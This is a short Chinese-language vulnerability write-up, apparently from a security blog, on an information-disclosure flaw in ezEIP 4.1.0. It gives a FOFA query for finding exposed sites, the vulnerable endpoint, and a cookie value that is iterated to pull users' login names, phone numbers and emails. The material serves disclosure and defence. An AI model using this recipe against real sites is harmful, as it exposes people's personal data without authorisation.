# ezEIP 4.1.0 信息泄露漏洞
## 漏洞描述
ezEIP 4.1.0 存在信息泄露漏洞,通过遍历Cookie中的参数值获取敏感信息
## 漏洞影响
> [!NOTE]
>
> ezEIP 4.1.0
## FOFA
> [!NOTE]
>
> “ezEIP”
## 漏洞复现
漏洞Url为
“`
/label/member/getinfo.aspx
“`
访问时添加Cookie(通过遍历获取用户的登录名电话邮箱等信息)
“`
WHIR_USERINFOR=whir_mem_member_pid=1;
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容